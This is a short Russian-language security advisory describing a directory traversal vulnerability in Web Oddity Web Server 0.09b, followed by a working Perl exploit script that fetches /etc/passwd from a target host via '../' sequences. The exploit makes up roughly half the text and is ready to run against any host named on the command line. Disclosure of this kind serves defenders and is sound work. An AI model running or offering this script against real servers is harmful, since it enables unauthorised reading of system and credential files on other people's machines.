Программа: Web Oddity Web Server 0.09b

Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной информации на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных при обработке последовательностей символов обхода директорий. Атакующий может передать специально составленный запрос, содержащий символы обхода директорий, что позволит прочитать произвольные файлы на целевой системе.

Пример:

use LWP::Simple;
use strict;
sub usage
{
print "----------------------------------------------------- - -----------\n";
print "Web Oddity Web Server 0.09b Directory Transversal Vulnerability\n";
print "\n";
print "usage: $0 www.site.com\n";
print "------------------------------------------------- Katatafish-----\n";
exit ();
}
my $host=shift || &usage;
getprint 'http://' . $host . '/../../../../../../../etc/passwd';



Оставить мнение